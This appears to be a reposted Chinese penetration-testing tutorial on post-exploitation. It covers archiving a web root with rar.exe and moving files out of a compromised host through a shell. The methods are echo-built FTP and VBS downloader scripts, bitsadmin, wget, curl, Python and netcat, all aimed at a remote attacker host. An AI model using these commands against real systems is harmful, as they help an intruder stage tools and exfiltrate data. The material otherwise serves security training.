欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

内网渗透之——数据压缩、传输

程序员文章站 2022-05-15 20:23:59
...

数据压缩

作用:

将文件打包,方便下载

Linux

直接使用tar命令压缩

windows

利用Rar.exe(winrar.exe里的执行文件)

参数说明:

a 添加文件到压缩文件中
-k 锁定压缩文件
-s产生固体存档,这样可以增大压缩比
-r包括子目录
-m 设置压缩比
        -m0 存储 添加到压缩文件时不压缩文件。
        -m1 最快 使用最快方式(低压缩)
        -m2 较快 使用快速压缩方式
        -m3 标准 使用标准(默认)压缩方式
        -m4 较好 使用较好压缩方式(较好压缩,但是慢)
        -m5 最好 使用最大压缩方式(最好的压缩,但是最慢)

常用压缩命令
把C:\inetpub\wwwroot目录下的所有东西打包为1.rar放到C:\inetpub\wwwroot目录下

rar.exe a -r -m1 C:\inetpub\wwwroot\1.rar C:\inetpub\wwwroot

内网渗透之——数据压缩、传输

数据传输

作用:

如果我们只拿到了一个命令行shell ,是无法直接传输文件的

Windwos

ftp上传下载

交互式命令行

1.输入ftp进入命令行使用ftp模式

内网渗透之——数据压缩、传输

2.输入?可查看命令

内网渗透之——数据压缩、传输

3.输入命令登陆ftp,之后输入账号密码

open 192.168.0.106(ftp地址)
ftp 192.168.0.106(ftp地址)

内网渗透之——数据压缩、传输

4.查看FTP服务器上的文件
dir:显示服务器目录和文件列表
ls:显示服务器简易的文件列表
cd:进入服务器指定的目录

内网渗透之——数据压缩、传输

5.上传下载文件
上传和下载文件时应该使用正确的传输类型,FTP的传输类型分为ASCII码方式和二进制方式两种,对.txt、.htm等文件应采用ASCII码方式传输,对.exe或图片、视频、音频等文件应采用二进制方式传输。在默认情况下,FTP为ASCII码传输方式

设置传输方式
type:查看当前的传输方式
ascii:设定传输方式为ASCII码方式
binary:设定传输方式为二进制方式
以上命令都不带参数

下载文件:
下载指定文件:filename为下载的FTP服务器上的文件名,newname为保存在本地计算机上时使用的名字,如果不指定newname,文件将以原名保存,get命令下载的文件将保存在本地计算机的工作目录下(当前目录)

get filename newname

内网渗透之——数据压缩、传输内网渗透之——数据压缩、传输

上传文件:
上传指定文件:

filename为上传的本地文件名,newname为上传至FTP服务器上时使用的名字,如果不指定newname,文件将以原名上传

put filename newname
send filename newname

内网渗透之——数据压缩、传输

6.结束并退出FTP
close:结束与服务器的FTP会话
quit或者bye:结束与服务器的FTP会话并退出FTP环境

7. 其它FTP命令
pwd:查看FTP服务器上的当前工作目录
rename filename newfilename:重命名FTP服务器上的文件
deletefilename:删除FTP服务器上的文件

非交互式命令行

原理:命令行直接输入ftp -s:文件名,就会将文件里写好的ftp命令执行

1.利用重定向依次将ftp命令写入txt文件

echo open 192.168.0.106>> ftp.txt
echo lp>> ftp.txt
echo 123456>> ftp.txt
echo get 1.txt xxx.txt>> ftp.txt
echo bye>> ftp.txt

内网渗透之——数据压缩、传输

2.输入以下命令,ftp.txt文件里的命令就会执行

ftp -s:ftp.txt

内网渗透之——数据压缩、传输内网渗透之——数据压缩、传输

vbs脚本下载

vbs脚本内容:修改http://192.168.0.106/1.php处为下载的文件,C:\Users\Administrator\1.php处为下载到哪

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.0.106/1.php",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\Administrator\1.php",2

交互式shell

直接输入cscript 1.vbs即可执行

内网渗透之——数据压缩、传输             内网渗透之——数据压缩、传输

非交互式命令行

1.利用重定向依次将vbs脚本内容写入vbs文件

echo Set xPost=createObject("Microsoft.XMLHTTP")>> 2.vbs
echo xPost.Open "GET","http://192.168.0.106/1.php",0 >> 2.vbs
echo xPost.Send()>> 2.vbs
echo set sGet=createObject("ADODB.Stream")>> 2.vbs
echo sGet.Mode=3 >> 2.vbs
echo sGet.Type=1 >> 2.vbs
echo sGet.Open()>> 2.vbs
echo sGet.Write(xPost.ResponseBody)>> 2.vbs
echo sGet.SaveToFile "C:\Users\Administrator\lpxr.php",2 >> 2.vbs

2.输入cscript 2.vbs执行

内网渗透之——数据压缩、传输       内网渗透之——数据压缩、传输

bitsadmin下载

Windows2008 可用

命令: 

bitsadmin /transfer n http://192.168.0.106/1.zip c:\12.zip

http://192.168.0.106/1.zip:从哪里下载     c:\12.zip:下载到哪

内网渗透之——数据压缩、传输

内网渗透之——数据压缩、传输           内网渗透之——数据压缩、传输

 

Linux

wget文件下载

命令

wget http://192.168.0.106/1.zip -P /root/1.zip

http://192.168.0.106/1.zip:下载路径     -P /root/1.zip:指定下载到哪

内网渗透之——数据压缩、传输

curl文件下载

命令

curl http://192.168.0.106/1.zip --output aa.zip

http://192.168.0.106/1.zip:下载路径     --output aa.zip:指定下载到哪

内网渗透之——数据压缩、传输

python文件下载

脚本内容

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.0.106/1.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()

http://192.168.0.106/1.zip替换下载地址     /root/1.zip处写下载到哪
之后执行

nc文件传输

服务端输入:

cat filename | nc -lvvp 1234

内网渗透之——数据压缩、传输

下载端输入:

nc 下载地址ip 1234 > filename

内网渗透之——数据压缩、传输

相关标签: 后渗透